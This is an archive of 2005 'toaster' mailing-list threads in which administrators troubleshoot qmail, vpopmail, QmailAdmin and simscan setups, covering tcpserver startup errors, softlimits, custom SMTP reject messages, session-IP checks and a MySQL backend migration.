- Original Message - From: "David" <[EMAIL PROTECTED]> To: Sent: Sunday, March 27, 2005 12:50 PM Subject: Re: [toaster] qmail-smtpd, qmail-pop3d and qmail-pop3s won't start... Thanks Bill for the reply; - Original Message - From: "Bill Shupp" <[EMAIL PROTECTED]> To: Sent: Sunday, March 27, 2005 9:00 AM Subject: Re: [toaster] qmail-smtpd, qmail-pop3d and qmail-pop3s won't start... David wrote: Hi all, Have made several Shupp toaster installs now, but this most recent one has stumped me. It's on fedora core 3, (x86_64) and I made sure there were no running smtp/pop3/pop3s services before I began: but neither qmail-smtpd, pop3d or pop3ds will start, using qmailctl script. In each of those daemons' logs, there is: tcpserver: fatal: temporarily unable to figure out IP address for 0.0.0.0: file does not exist Has anyone seen this before? I can't work out why tcpserver is being passed a hostname or IP address of 0.0.0.0 The latest toasters are built on netqmail, which has the 0.0.0.0 patch. Did you use the last toaster patch? Oh... I used the latest version of the toaster (.7.9) with all downloads from there - netqmail 1.05. Could this be a x86_64 specific problem? David. I still can't find a solution for this; and I can only find one or two other mentions of this problem on the 'net. I wonder if other people installing the toaster on x86_64 (AMD64) arch. Fedora core 3 will have the same problem? I have in the meantime slightly 'hacked' things to get this to work, so I've posted the details here while I can still remember them: I have two toaster installs which I have done side-by-side (or so to speak), one running redhat 9/i686 (which has been up for months) and one which I just recently installed on FC3/AMD64. As mentioned the FC3 install keeps logging over and over the message: "tcpserver: fatal: temporarily unable to figure out IP address for 0.0.0.0: file does not exist" which I thought was fixed by a patch in netqmail... I've never had this problem before. Well it seems to be a problem with tcpserver. I tried issuing the command out of the service run script for smtpd on the command line, running as root, on both machines (the rh9 and fc3), substituting the program to be launched by tcpserver for 'cat' (so it would exist on both, and to see if i still got the error without qmail-smtpd binary in the picture) with all qmail services stopped: rh9]# /usr/local/bin/tcpserver -v -H -R -l 0 \ -x /home/vpopmail/etc/tcp.smtp.cdb -c "$MAXSMTPD" \ -u "$QMAILDUID" -g "$NOFILESGID" 0 smtp \ cat \ result: tcpserver: status: 0/0 ok, so on the fc3 box: fc3]# /usr/local/bin/tcpserver -v -H -R -l 0 \ -x /home/vpopmail/etc/tcp.smtp.cdb -c "$MAXSMTPD" \ -u "$QMAILDUID" -g "$NOFILESGID" 0 smtp \ cat \ result: tcpserver: fatal: temporarily unable to figure out IP address for 0.0.0.0: file does not exist So I figured I had narrowed it down to tcpserver, having countless times re-installed/rebuilt the qmail and daemontools/uscpi from the (Shupp) source... so i cheated and copied the tcpserver binary accross from the rh9 box. Then I got: fc3]# /usr/local/bin/tcpserver -v -H -R -l 0 \ -x /home/vpopmail/etc/tcp.smtp.cdb -c "$MAXSMTPD" \ -u "$QMAILDUID" -g "$NOFILESGID" 0 smtp \ cat \ result: tcpserver: status: 0/0 So far it seemed ok... but checking the smtpd logfile: fc3]# tail /var/log/qmail/smtpd/current | tai64nlocal 2005-03-27 19:38:52.934767500 tcpserver: pid 11812 from [foreign ip] 2005-03-27 19:38:52.934769500 tcpserver: ok 11812 0:[my ip]:25 :[foreign ip]::22216 2005-03-27 19:38:52.934771500 /var/qmail/bin/qmail-smtpd: error while loading shared libraries: libz.so.1: failed to map segment from shared object: Cannot allocate memory Rats. So after more testing I increased the softlimit value in the /service/qmail-smtpd/run script, and it worked. smtpd service came up, stayed up, and delivered mail. I changed the softlimit from 800 (8,000,000) to 3200 (32,000,000) - this was the smallest setting I could manage to make it work with. I am a little worried that I have had to quadruple the amount of RAM allowed for qmailsmtpd to run; however I haven't had to increase the softlimits for either pop3d or pop3ds services, which work after the tcpserver replacement, and they didn't work before either... should I be concerned about a softlimit this big? Btw, I have not installed simscan or any other qmailqueue "plugin". Sorry about the long post, I hope the extra info might help spark an idea that could help me solve this problem more cleanly Thanks again, David. Regards, Bill !DSPAM:424626a839461389110235!
Re: [toaster] qmail-smtpd, qmail-pop3d and qmail-pop3s won't start...
Thanks Bill for the reply; - Original Message - From: "Bill Shupp" <[EMAIL PROTECTED]> To: Sent: Sunday, March 27, 2005 9:00 AM Subject: Re: [toaster] qmail-smtpd, qmail-pop3d and qmail-pop3s won't start... David wrote: Hi all, Have made several Shupp toaster installs now, but this most recent one has stumped me. It's on fedora core 3, (x86_64) and I made sure there were no running smtp/pop3/pop3s services before I began: but neither qmail-smtpd, pop3d or pop3ds will start, using qmailctl script. In each of those daemons' logs, there is: tcpserver: fatal: temporarily unable to figure out IP address for 0.0.0.0: file does not exist Has anyone seen this before? I can't work out why tcpserver is being passed a hostname or IP address of 0.0.0.0 The latest toasters are built on netqmail, which has the 0.0.0.0 patch. Did you use the last toaster patch? Oh... I used the latest version of the toaster (.7.9) with all downloads from there - netqmail 1.05. Could this be a x86_64 specific problem? David. Regards, Bill !DSPAM:4245f0b830071352512884!
[toaster] qmail-smtpd, qmail-pop3d and qmail-pop3s won't start...
Hi all, Have made several Shupp toaster installs now, but this most recent one has stumped me. It's on fedora core 3, (x86_64) and I made sure there were no running smtp/pop3/pop3s services before I began: but neither qmail-smtpd, pop3d or pop3ds will start, using qmailctl script. In each of those daemons' logs, there is: tcpserver: fatal: temporarily unable to figure out IP address for 0.0.0.0: file does not exist Has anyone seen this before? I can't work out why tcpserver is being passed a hostname or IP address of 0.0.0.0 Thanks, David.
Re: Re[2]: [toaster] qmail-queue-custom-error.patch
- Original Message - From: "Ernest Ho" <[EMAIL PROTECTED]> To: Sent: Tuesday, March 15, 2005 10:16 PM Subject: Re: Re[2]: [toaster] qmail-queue-custom-error.patch > Dear Vladimir > > Yes, it is an option in Toaster. You can download the > patch at: http://www.shupp.org/patches/custom.patch to > patch the qmail. And, you have to add the configure > option of "--custom-smtp-reject" when you configure > simscan. > > I did it and it works. Cool! I tried the same and it worked for me too - I just did (in my netqmail-1.05 src dir): (I had latest toaster already installed and working for some weeks): cd /var/src/netqmail-1.05/netqmail-1.05 make clean patch < /path/to/custom.patch make qmailctl stop make setup check then in /var/src/simscan-1.1 make clean ./configure (added --enable-custom-smtp-reject=y) make make install-strip and now when I send an infected message to one of my email addresses I get this in my bounce messages (for example): Remote host said: 554 Your email was rejected because it contains the Eicar-Test-Signature virus Very cool! David. > Ernest > > --- Vladimir Kozlov <[EMAIL PROTECTED]> wrote: > > Don't think so. Imagine regular user who would like > > to send a message > > to you, and got the > > > > 551 Message rejected by server > > > > or whatsoever... > > > > With this patch he (she) will get: > > > > 551 Your message is detected as spam > > > > or > > > > 551 Your message contains Bagle-MM virus > > > > or > > > > 551 Your message contains prohibited attachment > > 'program.pif' > > > > If I will be such a 'regular user' my further steps > > would be different > > in these cases: > > a) If I have a virus, I would check my box and > > resend message after > > cleaning; > > b) If I've got an attachment problem, I would resend > > the same with > > zip-ped attachment; > > c) If I've got the spam complaint (and I definitely > > know it is NOT > > spam), I would try to re-phrase my email. > > > > Kind regards, > > > > Vladimir. > > > > > Vladimir Kozlov wrote: > > >> Hello, > > >> > > >> Is the qmail-queue-custom-error.patch included > > into the toaster? I > > >> think it would be useful to let senders know why > > their message was > > >> rejected. > > > > > No? Basic error messages should be enought? > > > > > -- > > > Eero > > > > > > > > > > __ > Do you Yahoo!? > Yahoo! Small Business - Try our new resources site! > http://smallbusiness.yahoo.com/resources/ > > !DSPAM:4236cb3a146331396811038! > > >
Re: [toaster] how to convert passwords from sql vpopmail to cdb?
- Original Message - From: "Eero Volotinen" <[EMAIL PROTECTED]> To: Sent: Sunday, March 13, 2005 10:43 PM Subject: [toaster] how to convert passwords from sql vpopmail to cdb? > Ideas, fast? > > Old system was running mysql backend, and I didn't noticed it. There's a utility installed with vpopmail that I use for that - should be at ~vpopmail/bin/vconvert Running it without argument will give usage info. David. > -- > Eero > > !DSPAM:42342fef23611310016026! > > >
Re: [toaster] SMTP over SSL
> While not an answer to your question, I simpy use putty and an SSH > connection to port-tunnel STMP port 25 to my server, so it is > encrypted... but of course, this requires an open ssh login to the > server to work. I use OE express to do this, and just set the server > to "localhost" and port to 2525, and then tunnel local port 2525 to > myserver.com:25. Works very well. I do the same for POP access. Interesting... thanks for the info. Hank. I have used that method before with other services, might give it a try... > On a related note, does anyone know an easy way to export all my OE > mail into qmail+IMAP, other than copy/paste - which I can only do one > folder at a time? Oddly enough, I've had to do the same thing - I have used a very small Windows program in the past, which was able to convert OE (.dbx/.mbx) or Outlook (.pst) files to mbox and vice-versa... but I can't find it again! I found another one eventually for linux which worked for me (several didn't) - you might have some luck with it too: http://sourceforge.net/projects/ol2mbox > > -Hank David > > On Mon, 7 Mar 2005 02:53:12 +1030, David <[EMAIL PROTECTED]> wrote: > > > > > > > > > David wrote: > > > > Hi all, > > > > > > > > I have not managed to get SMTP working over SSL with one of Bill's > > toasters. > > > > Is this feature supported ? > > > > > > > > I am using one of Bill's toasters installed on a RH9 box, everything > > else > > > > works fine. Toaster version 0.7.7. > > > > > > > > I use Outlook Express as my mail client, and tested it as follows: > > > > > > > > - I tried sending messages over standard SMTP (port 25), authenticating > > on > > > > the SMTP server with my username (e-mail address) and password > > > > > > > > - I tried enabling SSL for the SMTP server, and changing the port to > > 465, > > > > and still authenticating on the SMTP server in the same way as before > > and I > > > > just get the "the connection to the server has failed, socket error, > > using > > > > SSL" message. > > > > > > > > - I tried the same thing again but with port set to 25, same result. > > > > > > > > If SSL is not available for SMTP, that is my answer! otherwise... does > > > > anybody have any clues ? Any more information I need to provide? > > > > > > Hi, > > > > > > SSL is not available but TLS is (ie secure authentication). > > > > > > I don't use OE so I'm not sure if it supports TLS but Thunderbird does. > > > > > > Regards, > > > > > > Rick > > > > > > > > > > > > > > > > Ah. Oh well, I guess can do without SMTP-SSL... > > > > Thanks Rick! > > > > David. > > > > > > > -- > > -Hank > > !DSPAM:422b354d121912119861086! > > >
Re: [toaster] SMTP over SSL
> > > David wrote: > > Hi all, > > > > I have not managed to get SMTP working over SSL with one of Bill's toasters. > > Is this feature supported ? > > > > I am using one of Bill's toasters installed on a RH9 box, everything else > > works fine. Toaster version 0.7.7. > > > > I use Outlook Express as my mail client, and tested it as follows: > > > > - I tried sending messages over standard SMTP (port 25), authenticating on > > the SMTP server with my username (e-mail address) and password > > > > - I tried enabling SSL for the SMTP server, and changing the port to 465, > > and still authenticating on the SMTP server in the same way as before and I > > just get the "the connection to the server has failed, socket error, using > > SSL" message. > > > > - I tried the same thing again but with port set to 25, same result. > > > > If SSL is not available for SMTP, that is my answer! otherwise... does > > anybody have any clues ? Any more information I need to provide? > > Hi, > > SSL is not available but TLS is (ie secure authentication). > > I don't use OE so I'm not sure if it supports TLS but Thunderbird does. > > Regards, > > Rick > > > !DSPAM:422b2d37116972033915540! > Ah. Oh well, I guess can do without SMTP-SSL... Thanks Rick! David.
[toaster] SMTP over SSL
Hi all, I have not managed to get SMTP working over SSL with one of Bill's toasters. Is this feature supported ? I am using one of Bill's toasters installed on a RH9 box, everything else works fine. Toaster version 0.7.7. I use Outlook Express as my mail client, and tested it as follows: - I tried sending messages over standard SMTP (port 25), authenticating on the SMTP server with my username (e-mail address) and password - I tried enabling SSL for the SMTP server, and changing the port to 465, and still authenticating on the SMTP server in the same way as before and I just get the "the connection to the server has failed, socket error, using SSL" message. - I tried the same thing again but with port set to 25, same result. If SSL is not available for SMTP, that is my answer! otherwise... does anybody have any clues ? Any more information I need to provide? Thanks, David.
Re: [toaster] Qmailadmin errors SOLVED
- Original Message - From: "Bill Shupp" <[EMAIL PROTECTED]> To: Sent: Sunday, February 27, 2005 2:56 AM Subject: Re: [toaster] Qmailadmin errors SOLVED > David wrote: > > >I can successfully perform all functions in qmailadmin since I removed my > >qmailadmin domain from round-robin. So my solution will I think be to put it > >on a sub-domain on a host which isn't part of the round-robin and whose IP > >address won't change, and keep qmailadmin's IP security features. > > > >Thanks for your help once again guys. > > > > > > I thought the IP security was only sensitive to the remote address, not > the local address of the qmailadmin server. What's the advantage of > checking the IP of the local server for security? Don't know if this question was for me and sorry if I'm confusing the issue here with my limited knowledge of what's going on... what I meant by the round-robin setup was that I started using round-robin DNS on the (remote) server I'm running qmailadmin on, and trying to connect to it over the internet I suddenly found myself locked-out of any of the menu functions due to "file error 6". Not sure if this problem was exacerbated by my client machine's internet connection setup... but when I changed the DNS for the remote qmailadmin server back to a single IP address the problem has now gone away; I can use all the menu functions now without a "file error 6". David. > Regards, > > Bill > >
Re: [toaster] Qmailadmin errors SOLVED
- Original Message -
From: "David" <[EMAIL PROTECTED]>
To:
Sent: Thursday, February 24, 2005 11:29 PM
Subject: Re: [toaster] Qmailadmin errors
> Thanks guys...
>
> - Original Message -
> From: "Tom Collins" <[EMAIL PROTECTED]>
> To:
> Sent: Thursday, February 24, 2005 5:23 AM
> Subject: Re: [toaster] Qmailadmin errors
>
>
> > On Feb 23, 2005, at 10:42 AM, Bill Shupp wrote:
> > >> File error 6 (192.168.0.10, != 192.168.0.10 ..
> > >> ip_addr=192.168.0.10&returntext=&returnhttp= )
> > >
> > > Try using --disable-ipauth. I don't know why this started happening
> > > out of the blue, though.
> >
> > It's very odd. It's like the web server is setting REMOTE_ADDR to
> > include both the private and public IP of the machine accessing the
> > page. I'm not sure how it could even get the private IP in the first
> > place...
>
> That confuses me too; but I have seen a few websites able to return the
> private IP of my PC.
>
> > The cryptic "File error 6" is a security thing to prevent someone from
> > hijacking your session. If your IP address changes during your
> > QmailAdmin session, it will bail with that error.
>
> Ah, cool.
>
> > Bill has the correct solution, --disable-ipauth in the configuration
> > options.
>
> OK, thanks - I will do if it comes to that!
>
> > This might be interesting -- try running this simple perl script as a
> > cgi and see what it reports:
> >
> > #!/usr/bin/perl
> >
> > print "Content-type: text/plain\n\n";
> >
> > foreach (sort keys %ENV) {
> > print "$_ is $ENV{$_}\n";
> > }
>
> Here are my edited results (sorry did the removing public IP/domain names
> thing:)
>
> --
--
>
>
> DOCUMENT_ROOT is /www/vhost/www.qmailadminsite.tld
> GATEWAY_INTERFACE is CGI/1.1
> HTTP_ACCEPT is image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
> application/vnd.ms-powerpoint, application/vnd.ms-excel,
application/msword,
> application/x-shockwave-flash, */*
> HTTP_ACCEPT_ENCODING is gzip, deflate
> HTTP_ACCEPT_LANGUAGE is en-au
> HTTP_CACHE_CONTROL is max-age=259200
> HTTP_CONNECTION is keep-alive
> HTTP_COOKIE is AWSUSER_ID=awsuser_id1107818209949r6720
> HTTP_HOST is www.qmailadminsite.tld
> HTTP_USER_AGENT is Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET
> CLR 1.0.3705)
> HTTP_VIA is 1.1 squid.mylinuxrouter.tld:3128 (squid/2.5.STABLE4-20040111),
> 1.0 adl-pow-pr1.tpgi.com.au:3128 (squid/2.5.STABLE7)
> HTTP_X_FORWARDED_FOR is 192.168.0.10, 220.244.57.214
> PATH is /sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
> QUERY_STRING is
> REMOTE_ADDR is
> REMOTE_PORT is 53116
> REQUEST_METHOD is GET
> REQUEST_URI is /cgi-bin/test.cgi
> SCRIPT_FILENAME is /www/cgi-bin/test.cgi
> SCRIPT_NAME is /cgi-bin/test.cgi
> SERVER_ADDR is
> SERVER_ADMIN is [EMAIL PROTECTED]
> SERVER_NAME is www.qmailadminsite.tld
> SERVER_PORT is 80
> SERVER_PROTOCOL is HTTP/1.0
> SERVER_SIGNATURE is Apache/1.3.33 Server at HREF="mailto:[EMAIL PROTECTED]">www.qmailadminsite.tld Port
> 80
>
> SERVER_SOFTWARE is Apache/1.3.33 (Unix) PHP/4.3.10 mod_ssl/2.8.22
> OpenSSL/0.9.7d
>
> --
--
>
>
> From this, I wonder if our recent change to round-robin of
> www.qmailadminsite.tld could have affected things? Considering that the
> check is IP address-based?
>
> Only thing is, I wouldn't expect that the IP address could change
> mid-session... I mean the M$ browser I'm using supposedly caches
successful
> DNS responses for 12 hours by default...
>
> Thanks again,
> David.
>
> > --
> > Tom Collins - [EMAIL PROTECTED]
> > QmailAdmin: http://qmailadmin.sf.net/ Vpopmail: http://vpopmail.sf.net/
> > You don't need a laptop to troubleshoot high-speed Internet:
> > sniffter.com
> >
> >
> >
>
>
>
Well I don't know if all that info. from the CGI script has been helpful to
anyone, but I think my problem is solved now. I think I brought the problem
on by recently adding the domain my qmailadmin package is served under into
a round-robin type DNS configuration of two IP addresses. Even though M$
Internet Explorer caches a DNS query internally for some great long time (12
hours I heard) it seems that something else in my internet connection
chain - perhaps my Linux firewall - doesn't, and I'm guessing that's what
tripped the error :
> > The cryptic "File error 6" is a security thing to prevent someone from
> > hijacking your session. If your IP address changes during your
> > QmailAdmin session, it will bail with that error.
I can successfully perform all functions in qmailadmin since I removed my
qmailadmin domain from round-robin. So my solution will I think be to put it
on a sub-domain on a host which isn't part of the round-robin and whose IP
address won't change, and keep qmailadmin's IP security features.
Thanks for your help once again guys.
David.
Re: [toaster] Qmailadmin errors
Thanks guys...
- Original Message -
From: "Tom Collins" <[EMAIL PROTECTED]>
To:
Sent: Thursday, February 24, 2005 5:23 AM
Subject: Re: [toaster] Qmailadmin errors
> On Feb 23, 2005, at 10:42 AM, Bill Shupp wrote:
> >> File error 6 (192.168.0.10, != 192.168.0.10 ..
> >> ip_addr=192.168.0.10&returntext=&returnhttp= )
> >
> > Try using --disable-ipauth. I don't know why this started happening
> > out of the blue, though.
>
> It's very odd. It's like the web server is setting REMOTE_ADDR to
> include both the private and public IP of the machine accessing the
> page. I'm not sure how it could even get the private IP in the first
> place...
That confuses me too; but I have seen a few websites able to return the
private IP of my PC.
> The cryptic "File error 6" is a security thing to prevent someone from
> hijacking your session. If your IP address changes during your
> QmailAdmin session, it will bail with that error.
Ah, cool.
> Bill has the correct solution, --disable-ipauth in the configuration
> options.
OK, thanks - I will do if it comes to that!
> This might be interesting -- try running this simple perl script as a
> cgi and see what it reports:
>
> #!/usr/bin/perl
>
> print "Content-type: text/plain\n\n";
>
> foreach (sort keys %ENV) {
> print "$_ is $ENV{$_}\n";
> }
Here are my edited results (sorry did the removing public IP/domain names
thing:)
DOCUMENT_ROOT is /www/vhost/www.qmailadminsite.tld
GATEWAY_INTERFACE is CGI/1.1
HTTP_ACCEPT is image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-shockwave-flash, */*
HTTP_ACCEPT_ENCODING is gzip, deflate
HTTP_ACCEPT_LANGUAGE is en-au
HTTP_CACHE_CONTROL is max-age=259200
HTTP_CONNECTION is keep-alive
HTTP_COOKIE is AWSUSER_ID=awsuser_id1107818209949r6720
HTTP_HOST is www.qmailadminsite.tld
HTTP_USER_AGENT is Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET
CLR 1.0.3705)
HTTP_VIA is 1.1 squid.mylinuxrouter.tld:3128 (squid/2.5.STABLE4-20040111),
1.0 adl-pow-pr1.tpgi.com.au:3128 (squid/2.5.STABLE7)
HTTP_X_FORWARDED_FOR is 192.168.0.10, 220.244.57.214
PATH is /sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
QUERY_STRING is
REMOTE_ADDR is
REMOTE_PORT is 53116
REQUEST_METHOD is GET
REQUEST_URI is /cgi-bin/test.cgi
SCRIPT_FILENAME is /www/cgi-bin/test.cgi
SCRIPT_NAME is /cgi-bin/test.cgi
SERVER_ADDR is
SERVER_ADMIN is [EMAIL PROTECTED]
SERVER_NAME is www.qmailadminsite.tld
SERVER_PORT is 80
SERVER_PROTOCOL is HTTP/1.0
SERVER_SIGNATURE is Apache/1.3.33 Server at mailto:[EMAIL PROTECTED]">www.qmailadminsite.tld Port
80
SERVER_SOFTWARE is Apache/1.3.33 (Unix) PHP/4.3.10 mod_ssl/2.8.22
OpenSSL/0.9.7d
>From this, I wonder if our recent change to round-robin of
www.qmailadminsite.tld could have affected things? Considering that the
check is IP address-based?
Only thing is, I wouldn't expect that the IP address could change
mid-session... I mean the M$ browser I'm using supposedly caches successful
DNS responses for 12 hours by default...
Thanks again,
David.
> --
> Tom Collins - [EMAIL PROTECTED]
> QmailAdmin: http://qmailadmin.sf.net/ Vpopmail: http://vpopmail.sf.net/
> You don't need a laptop to troubleshoot high-speed Internet:
> sniffter.com
>
>
>
[toaster] Qmailadmin errors
Hi all, I have been using version 0.6 of the Shupp toaster quite successfully on several installations of RedHat 9 for a while now. Today however one particular install which has been up for about 8 months started giving me errors. I can login OK, but when I try to select an option from the main menu (ie. view email accounts, view forwards) it just throws me back to the login screen with an error at the top of the page like this: File error 6 (192.168.0.10, != 192.168.0.10 .. ip_addr=192.168.0.10&returntext=&returnhttp= ) where is the public IP address of my adsl connection that I use to access the net with (I have a linux router). The system is RedHat 9 and is separated from me geographically and I connect over the 'net; is the public IP of my personal internet connection's firewall and 192.168.0.10 is the IP of the machine I am running the web browser on, using this internet connection. If anyone has a clue as to what is wrong here, I would very much appreciate the help. I have tried searching for an answer in the mail archive, but it doesn't seem that this question has been asked before; appologies if it has. With thanks in advance, David.
[toaster] Problems sending large files
Hi all, I have the latest (.76) version of Bill's toaster installed on a rh9 box, and some users of the system have been experiencing problems using outlook when attemptimg to send large file attachments. When trying to send a 17MB attachment recently I got a typical result: Your server has unexpectedly terminated the connection. Possible causes for this include server problems, network problems, or a long period of inactivity. Subject 'acrobat reader', Account: 'mail.aberfoylecomputers.com', Server: '192.168.100.1', Protocol: SMTP, Port: 25, Secure(SSL): No, Error Number: 0x800CCC0F ie. it just times out, taking a lot longer than expected (on the inside of the firewall this time, connection to the server is LAN - should only take about 10-20 seconds). Is there a maximum message size limit? I have searched for similar problems, and will keep searching, but if anyone has any ideas I'd be very grateful for some help. Thanks, David.
Re: [toaster] rcpthosts ignored
- Original Message - From: "Zavier Sheran" <[EMAIL PROTECTED]> To: Sent: Friday, February 11, 2005 1:07 PM Subject: [toaster] rcpthosts ignored > I've setup daemontools, ucspi-tcp, qmail, and > vpopmail. > > I can receive mail but when I try sending, I get the > 'sorry, that domain isn't in my list of allowed > rcpthosts file'. > > I have the mail client setup correctly and the domain > is in the rcpthosts file. Any idea what could cause > the blocking? smtp authentication perhaps - have you checked the contents of: tail /var/log/qmail/smtpd/current | tai64nlocal as you try to send? > -Zavier > > = > --- > zavier.net - Internet Solutions > --- David
RE: [toaster] SMTP Auth Doesn't work ??
Tom, Thanx a lot!! Your answer is correct, i have a PIX and they have rewriting the SMTP session. Sincery, thank you! (please, excuse my poor english) -Mensaje original- De: Tom Collins [mailto:[EMAIL PROTECTED] Enviado el: divendres, 4 / febrer / 2005 16:29 Para: toaster@shupp.org Asunto: Re: [toaster] SMTP Auth Doesn't work ?? On Feb 4, 2005, at 6:19 AM, David wrote: > At the 127.0.0.1 and in the DMZ looks: > > > 220 ESMTP > > > > But out looks: > > 220 > > It's normal? No. This has come up before though, on this list last November, here's the answer: http://www.mail-archive.com/toaster@shupp.org/msg01905.html You have a firewall (Cisco PIX or F5 Big IP) that is rewriting the SMTP session. -- Tom Collins - [EMAIL PROTECTED] QmailAdmin: http://qmailadmin.sf.net/ Vpopmail: http://vpopmail.sf.net/ Info on the Sniffter hand-held Network Tester: http://sniffter.com/
RE: [toaster] SMTP Auth Doesn't work ??
Hello, I'm not explained. In the logfiles of the SMTPD appears east message of the CHKUSER. My problem seems that it is SMTP AUTH. It does not work correctly. The same email address configured out of DMZ not Relay. The firewall has a rule to permit ALL. I tried connect by telnet but seems be different: At the 127.0.0.1 and in the DMZ looks: 220 ESMTP But out looks: 220 Its normal? What's the problem with the SMTP AUTH? My system is a SUSE. Thanx! -Mensaje original- De: tonix (Antonio Nati) [mailto:[EMAIL PROTECTED] Enviado el: dijous, 3 / febrer / 2005 20:51 Para: toaster@shupp.org Asunto: Re: [toaster] SMTP Auth Doesn't work ?? To avoid such messages, disable chkuser logs. This is not the first time I see such message. It looks like chkuser logs are not directed to log channels, but to smtp channel. I'ld like to understand why with chkuser logs, when working with auth, go to smtp channel. Tonino At 20.25 03/02/2005, you wrote: >Hello, >First, excuse my poor English. > >I have a problem with the SMTP AUTH. > > >I think that Ckkuser is not working properly. >I send an email from the same IP segment and no problems. > > > CHKUSER relaying rcpt: from remote > > rcpt : client allowed to relay > > > CHKUSER rejected relaying: from remote > rcpt : client not allowed to relay > > >What's wrong? >Why the first chkuser is and the >second ? > > > > >The email client responds in the first case: > >Respuesta del servidor: '553 sorry, that domain isn't in my list of allowed >rcpthosts (#5.5.3 - chkuser)', >Puerto: 25, Seguridad (SSL): No, Error de servidor: 553, Número de error: >0x800CCC79 > > > >Configuration: > >tcp.smtp > >127.:allow,RELAYCLIENT="" >:allow,QMAILQUEUE="/var/qmail/bin/simscan" > >qmail >vpopmail >spamassasin >clamav >simscan > > >Any ideas? >Thanx.
[toaster] SMTP Auth Doesn't work ??
Hello, First, excuse my poor English. I have a problem with the SMTP AUTH. I think that Ckkuser is not working properly. I send an email from the same IP segment and no problems. CHKUSER relaying rcpt: from remote rcpt : client allowed to relay CHKUSER rejected relaying: from remote : client not allowed to relay What's wrong? Why the first chkuser is and the second ? The email client responds in the first case: Respuesta del servidor: '553 sorry, that domain isn't in my list of allowed rcpthosts (#5.5.3 - chkuser)', Puerto: 25, Seguridad (SSL): No, Error de servidor: 553, Número de error: 0x800CCC79 Configuration: tcp.smtp 127.:allow,RELAYCLIENT="" :allow,QMAILQUEUE="/var/qmail/bin/simscan" qmail vpopmail spamassasin clamav simscan Any ideas? Thanx.
[toaster] CHKUSER messages appearing in log
Just a quick one - I noticed after upgrading to the 0.7.2 toaster (on RedHat 9), that I'm now getting CHKUSER lines in /var/log/qmail/current like so: CHKUSER accepted rcpt: from <[EMAIL PROTECTED]::> remote [EMAIL PROTECTED]:unknown:12.345.678.90 rcpt [EMAIL PROTECTED] : found existing recipient ...this is good! Just wondered, is this something that has been added in toaster 0.7.2, or was I just doing something wrong before (with 0.6 / RH9)? Thanks, David.
[toaster] qmail admin tools
Is anyone using vqadmin or vqregister with the 0.6 or 0.7 toaster? I would like a way to add/remove domains via a web interface, and these tools would seem to be the answer - but I think they're made by the same people as qmailadmin, and they're not in the toaster, so I'd like to know if they will work with the toaster? Thanks in advance, David.
Re: [toaster] Latest toaster
> Messages stored in SQL?? You can have the users and passwords stored > there, but there's really no reason at all to store the messages in > SQL.. (I'm not even aware of a patch that can provide this functionality) oops i was forgetting a bit confused there - maildir is the most reliable for storing the messages! Just users & passwords that go in the database. > Plus you have the ability to create an endless number of useless data > reports! How often people log in, average mail per user, etc.. *grin* :) I like things like that... never too many graphs... and of course it will make scripting so much easier without having to 'suexec' scripts to access the data. Thanks for the help, David. - Original Message - From: "Jason 'XenoPhage' Frisvold" <[EMAIL PROTECTED]> To: Sent: Thursday, January 06, 2005 1:51 AM Subject: Re: [toaster] Latest toaster > David wrote: > > >Thanks greatly for the very detailed instructions Bill, I will see how I > >go... I hope that I can get simscan working with dspam because I would like > >virus scanning... > > > > > I don't think simscan supports dspam yet.. It was talked about, but I'm > not sure support was added yet.. > > >Before I do I just thought it might be worth asking if there was a > >disadvantage to doing things this way (having messages stored in sql > >database instead of on disk)? > > > > > Messages stored in SQL?? You can have the users and passwords stored > there, but there's really no reason at all to store the messages in > SQL.. (I'm not even aware of a patch that can provide this functionality) > > >I was interested in an sql backend because I thought that way the number of > >users would scale better and I was really worried about doing something to > >the filesystem that would corrupt/lose messages for potentially many users > >(I use a few CGI scripts to make administration easier). Are there drawbacks > >to doing things this way, other than the obvious increase in complexity and > >overhead ? > > > > > SQL speeds things up a little when dealing with a large number of > users. It does cause extra complexity, and adds more failure points. > But, it's fairly easy to replicate elsewhere, and re-building the > database on a new machine is pretty simple. > > Plus you have the ability to create an endless number of useless data > reports! How often people log in, average mail per user, etc.. *grin* > > >David. > > > > > > -- > --- > Jason 'XenoPhage' Frisvold > Engine / Technology Programmer > [EMAIL PROTECTED] > RedHat Certified - RHCE # 803004140609871 > MySQL Pro Certified - ID# 207171862 > MySQL Core Certified - ID# 205982910 > --- > "Something mysterious is formed, born in the silent void. Waiting alone and unmoving, it is at once still and yet in constant motion. It is the source of all programs. I do not know its name, so I will call it the Tao of Programming." > >
Re: [toaster] Latest toaster
Thanks greatly for the very detailed instructions Bill, I will see how I go... I hope that I can get simscan working with dspam because I would like virus scanning... Before I do I just thought it might be worth asking if there was a disadvantage to doing things this way (having messages stored in sql database instead of on disk)? I was interested in an sql backend because I thought that way the number of users would scale better and I was really worried about doing something to the filesystem that would corrupt/lose messages for potentially many users (I use a few CGI scripts to make administration easier). Are there drawbacks to doing things this way, other than the obvious increase in complexity and overhead ? David. - Original Message - From: "Bill Shupp" <[EMAIL PROTECTED]> To: Sent: Wednesday, January 05, 2005 2:22 AM Subject: Re: [toaster] Latest toaster > David wrote: > > >- how can I configure the toaster with vpopmail mysql backend for users > >(just the users, keeping the preferences - .qmail files etc - as normal) > >I am aware of the tools to convert from flat-file to mysql and vice-versa, > >but I have thus far failed in converting a .6 toaster install to use > >mysql... > > > > > > > - compile new vpopmail source with "--enable-auth-module=mysql", but do > NOT install it. > - setup mysql database per README.mysql, and then > ~vpopmail/etc/vpopmail.mysql with the connection info > - from the new source directory, run "./vconvert -c -m", and it will add > all your information to the new vpopmail tables > - test the new database with "./vuserinfo [EMAIL PROTECTED]" to make sure > it works. > - make install > - when you recompile the new versions of linked programs like > qmailadmin, courier-imap and qmail-smtpd, they will start using the > mysql database. > > >- the default simscan config in the toaster is to use spam filtering - can I > >use this with dspam (which I have working with a .6 toaster) without > >conflicts/problems ? > > > > > > > I've never setup dspam, but I'm not sure simscan supports it (if it > needs an smtp harness). > > >- If I re-install from toaster .6, is there anything special I have to do to > >keep my ~vpopmail/domains folder and make it work with .7 ? > > > > > > > No. > > >I appologise if the last question has been asked before, I haven't searched > >*that much* for the answer yet... mainly interested in the first two. > > > >Thanks everyone for your 